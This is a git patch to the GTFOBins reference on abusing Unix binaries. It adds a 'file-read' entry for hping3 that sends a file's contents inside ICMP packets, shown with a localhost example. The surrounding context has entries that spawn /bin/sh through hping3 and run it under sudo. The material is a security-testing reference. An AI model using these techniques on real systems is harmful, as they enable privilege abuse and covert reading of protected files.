From 5bc062321a932fda34c95f7e45b14c8d58c7954b Mon Sep 17 00:00:00 2001 From: Vivaldo Chagas <67665267+Nosferatuvjr@users.noreply.github.com> Date: Fri, 30 Sep 2022 14:02:46 -0400 Subject: [PATCH] Fix file-read with hping3 --- _gtfobins/hping3.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index f66954f..c33a645 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -8,6 +8,11 @@ functions: - code: | ./hping3 /bin/sh -p + file-read: + - description: It is possible to send specific file contents if hping3 has sufficient permission. + - code: | + hping3 --icmp 127.0.0.1 --listen --signature --safe + hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt sudo: - code: | sudo hping3